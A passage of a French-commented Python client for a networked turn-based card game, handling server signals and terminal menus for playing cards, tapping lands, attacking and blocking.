socket.timeout:\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Temps d'attente dépassé\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint(\"Message reçu :\", data, \"de\", server_address)\n\n\t\t\t\tif(data[0] == \"ACCEPT\"):\n\t\t\t\t\t\n\t\t\t\t\tself.__game_netconfig = data[1]\n\t\t\t\t\tbreak\n\n\t\t\t\telif(data[0] == \"DECLINE\"):\n\n\t\t\t\t\tprint(data[1])\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# Demande de quitter\n\t\t\telif user_input == \"3\":\n\t\t\t\t\n\t\t\t\tsys.exit(0)\n\n\t# Connexion à la partie\n\tdef connect_game(self):\n\t\n\t\t# Connexion au serveur de jeu\n\t\tself.__game_socket.connect(self.__game_netconfig)\n\n\t\t# Réception depuis le serveur de jeu : ID Player (1)\n\t\tself.__player_id = int(self.recv_signal())\n\n\t\t# Réception depuis le serveur de jeu : Objet Player (2)\n\t\tself.__players = self.recv_gamestate()\n\n\tdef play(self):\n\n\t\tresult = \"\"\n\t\trequest = None\n\t\tresponse = None\n\t\tgamestate = None\n\n\t\twhile True:\n\n\t\t\t# Réception depuis le serveur de jeu : Signal (3)\n\t\t\tresponse = self.recv_signal()\n\n\t\t\tif(response == \"PLAY\"):\n\n\t\t\t\t# Choix de l'action\n\t\t\t\trequest = self.action_menu()\n\n\t\t\t\t# Envoi vers le serveur de jeu : Requête d'action (4)\n\t\t\t\tself.send_action(request)\n\n\t\t\t\t# Réception depuis le serveur de jeu : Acceptation / Refus (5)\n\t\t\t\tresponse = self.recv_signal()\n\n\t\t\t\t# En cas d'acceptation\n\t\t\t\tif(response == \"ACCEPT\"):\n\n\t\t\t\t\t# Réception depuis le serveur de jeu : Etat de la partie (6)\n\t\t\t\t\tgamestate = self.recv_gamestate()\n\n\t\t\t\t\t# Mise à jour des informations de jeu\n\t\t\t\t\tself.update(gamestate)\n\t\t\t\t\t\n\t\t\t\t\tif(DEBUG):\n\t\t\t\t\t\tprint(\"MAJ DE LA PARTIE\")\t\n\n\t\t\t\t# En cas de refus, on recommence\n\t\t\t\telif(response == \"DECLINE\"):\n\t\t\t\t\tcontinue\n\n\t\t\telif(response == \"GAME_UPDATE\"):\n\n\t\t\t\t# Réception depuis le serveur de jeu : Etat de la partie\n\t\t\t\tgamestate = self.recv_gamestate()\n\n\t\t\t\t# Mise à jour des informations de jeu\n\t\t\t\tself.update(gamestate)\n\t\t\t\t\n\t\t\t\tif(DEBUG):\n\t\t\t\t\tprint(\"MAJ DE LA PARTIE\")\n\n\t\t\telif(response == \"DEATH\"):\n\t\t\t\t\t\n\t\t\t\tresult = \"DEFEAT\"\n\t\t\t\t\n\t\t\t\tbreak\n\n\t\t\telif(response == \"VICTORY\"):\n\n\t\t\t\tresult = \"VICTORY\"\n\n\t\t\t\tbreak\n\n\t\treturn result\n\n\tdef action_menu(self):\n\n\t\tuser_input = \"\"\n\t\trequest = \"\"\n\t\ti = 0\n\t\tidentity = []\n\t\tselecting = True\n\n\t\tif(DEBUG):\n\t\t\tinput(\"[CLEAR SCREEN]\")\n\n\t\twhile True :\n\n\t\t\t# Rafraichissement de l'écran\n\t\t\tself.clear_terminal()\n\n\t\t\t# Affichage initial\n\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\tprint(\"[ SHOW_GAME (S) ]\")\n\t\t\tprint(\"[ MULLIGAN (0) ]\")\n\t\t\tprint(\"[ DRAW_CARD (1) ]\")\n\t\t\tprint(\"[ TAP_LAND (2) ]\")\n\t\t\tprint(\"[ PLAY_CARD (3) ]\")\n\t\t\tprint(\"[ USE_EFFECT (4) ]\")\n\t\t\tprint(\"[ SELECT (5) ]\")\n\t\t\tprint(\"[ ATTACK (6) ]\")\n\t\t\tprint(\"[ BLOCK (7) ]\")\n\t\t\tprint(\"[ SKIP_PHASE (8) ]\")\n\t\t\tprint(\"[ CONCEDE (9) ]\")\n\n\t\t\t# Récupération de l'entrée utilisateur\n\t\t\tuser_input = self.input(0,8)\n\n\t\t\tif(user_input == SHOW_GAME):\n\n\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\tself.clear_terminal()\n\n\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\tprint(\"Player\", player.get_id(), \"-\", player.get_life(), \"HP - Deck :\", 
len(player.get_board().get_deck().get_cards()))\n\t\t\t\t\tprint(player.get_mana_pool())\n\n\t\t\t\t\tfor card in player.get_board().get_hand():\n\t\t\t\t\t\t\n\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\t\tfor card in player.get_board().get_land_zone():\n\t\t\t\t\t\t\n\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint(\"[(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\t\tfor card in player.get_board().get_battle_zone():\n\n\t\t\t\t\t\tif(card.is_sick()):\n\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\tprint(\"[(S)(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"[(S)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\tprint(\"[(T)\" + card._name, end=\"] \")\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"[\" + card._name, end=\"] \")\n\n\t\t\t\t\tprint()\n\n\t\t\t\tinput(\">\")\n\n\t\t\telif(user_input == MULLIGAN):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"MULLIGAN\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == DRAW_CARD):\n\t\t\t\t\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"DRAW_CARD\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == TAP_LAND):\n\n\t\t\t\tif(self.__players[self.__player_id].landzone_size() > 0):\n\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de nos cartes terrain\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_land_zone():\n\n\t\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].landzone_size()-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].landzone_size()):\n\n\t\t\t\t\t\t\t\tidentity = self.__players[self.__player_id].get_board().get_land_zone()[user_input].get_identity()\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"TAP_LAND\",\n\t\t\t\t\t\t\t\t\t\"landzone_position\" : user_input,\n\t\t\t\t\t\t\t\t\t\"color\" : \"\"\n\t\t\t\t\t\t\t\t}\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t\tif(len(identity) == 1):\n\n\t\t\t\t\t\t\t\t\trequest[\"color\"] = identity[0]\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t# TODO : Ajouter la gestion des mana double via un menu de selection (compliqué)\n\t\t\t\t\t\t\t\t\t\tfor color in identity:\n\n\t\t\t\t\t\t\t\t\t\t\tprint(color + \" (\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\t\t\t\ti += 1\n\n\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\tuser_input = 
self.input(0,len(identity)-1)\n\n\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(identity)):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"color\"] = identity[user_input]\n\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tbreak\n\n\t\t\telif(user_input == PLAY_CARD):\n\n\t\t\t\tif(self.__players[self.__player_id].hand_size() > 0):\n\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_hand():\n\n\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].hand_size()-1)\t\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].hand_size()):\t\t\t\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"PLAY_CARD\",\n\t\t\t\t\t\t\t\t\t\"hand_position\" : user_input\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\tbreak\n\n\t\t\telif(user_input == USE_EFFECT):\n\n\t\t\t\tprint(\"y'a r\")\n\t\t\t\t\n\t\t\telif(user_input == SELECT):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"SELECT\",\n\t\t\t\t\t\"selections\" : []\n\t\t\t\t}\n\n\t\t\t\tselecting = True\n\n\t\t\t\twhile selecting:\n\n\t\t\t\t\t# Choix du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des joueurs\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(f\"PLAYER {player.get_id()} ({i})\")\n\n\t\t\t\t\t\t\ti = i + 1 \n\t\t\t\t\t\tprint(f\"STOP ({i})\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,i)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input == i):\n\n\t\t\t\t\t\t\t\tselecting = False\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\telif(user_input >= 0 and user_input < len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest[\"selections\"].append([])\n\n\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t# Choix de la zone\n\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t# Affichage des zones\n\t\t\t\t\t\t\t\t\tprint(\"PLAYER (0)\")\n\t\t\t\t\t\t\t\t\tprint(\"DECK (1)\")\n\t\t\t\t\t\t\t\t\tprint(\"HAND (2)\")\n\t\t\t\t\t\t\t\t\tprint(\"BATTLE_ZONE (3)\")\n\t\t\t\t\t\t\t\t\tprint(\"LAND_ZONE (4)\")\n\t\t\t\t\t\t\t\t\tprint(\"GRAVEYARD (5)\")\n\t\t\t\t\t\t\t\t\tprint(\"EXILE (6)\")\n\n\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\tuser_input = self.input(0,6)\n\n\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\tif(user_input == 
SELECTION_PLAYER):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"PLAYER\")\n\n\t\t\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_DECK):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"DECK\")\n\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_HAND):\n\n\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"HAND\")\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification que l'on soit le joueur concerné et qu'on possède des cartes\n\t\t\t\t\t\t\t\t\t\t\tif(request[\"selections\"][-1][TARGET_ID] == self.__player_id and self.__players[self.__player_id].hand_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_hand():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].hand_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].hand_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_BATTLEZONE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"BATTLE_ZONE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].battlezone_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_LANDZONE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].landzone_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"LAND_ZONE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 
0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_land_zone():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].landzone_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].landzone_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_GRAVEYARD):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].graveyard_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"GRAVEYARD\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_graveyard():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].graveyard_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < self.__players[self.__player_id].graveyard_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\t\t\t\t\telif(user_input == SELECTION_EXILE):\n\n\t\t\t\t\t\t\t\t\t\t\t# Vérification qu'il y ait des cartes dans la zone\n\t\t\t\t\t\t\t\t\t\t\tif(self.__players[self.__player_id].exile_size() > 0):\n\n\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(\"EXILE\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t# Choix de la carte\n\t\t\t\t\t\t\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Affichage des cartes\n\t\t\t\t\t\t\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_exile():\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprint(f\"{card.get_name()} ({i})\")\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].exile_size()-1)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < 
self.__players[self.__player_id].exile_size()):\t\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trequest[\"selections\"][-1].append(user_input)\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\tbreak\n\n\t\t\telif(user_input == ATTACK):\n\n\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t# Sélection du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de la liste des joueurs\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(\"[ Player \" + str(player.get_id()) + \" ]\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,len(self.__players)-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"ATTACK\",\n\t\t\t\t\t\t\t\t\t\"target\" : user_input,\n\t\t\t\t\t\t\t\t\t\"attacker\" : -1\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t# Sélection de la carte attaquante\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage des cartes sur notre Battle Zone\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\tif(card.is_sick()):\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\t\tprint(\"(S)(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"(S)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\n\t\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[self.__player_id].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\trequest[\"attacker\"] = user_input\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\telif(user_input == BLOCK):\n\n\t\t\t\tif(self.__players[self.__player_id].battlezone_size() > 0):\n\n\t\t\t\t\t# Sélection du joueur\n\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t# Affichage de la liste des joueurs\n\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\tfor player in self.__players:\n\n\t\t\t\t\t\t\tprint(\"[ Player \" + str(player.get_id()) + \" ]\")\n\n\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\tuser_input = self.input(0,len(self.__players)-1)\n\n\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\tif(user_input >= 0 and user_input < 
len(self.__players)):\n\n\t\t\t\t\t\t\t\trequest = { \n\t\t\t\t\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\t\t\t\t\"type\" : \"BLOCK\",\n\t\t\t\t\t\t\t\t\t\"target\" : user_input,\n\t\t\t\t\t\t\t\t\t\"ennemy_attacker\" : -1,\n\t\t\t\t\t\t\t\t\t\"blocker\" : -1\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif(self.__players[user_input].battlezone_size() > 0):\n\n\t\t\t\t\t\t# Sélection de la carte ennemie à bloquer\n\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t# Affichage de la Battle Zone ennemie\n\t\t\t\t\t\t\tprint(\"Joueur\", request[\"target\"], \"(\" + str(self.__players[request[\"target\"]].get_life()) + \")\")\n\t\t\t\t\t\t\tfor card in self.__players[request[\"target\"]].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[request[\"target\"]].battlezone_size()-1)\n\n\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[request[\"target\"]].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\t\trequest[\"ennemy_attacker\"] = 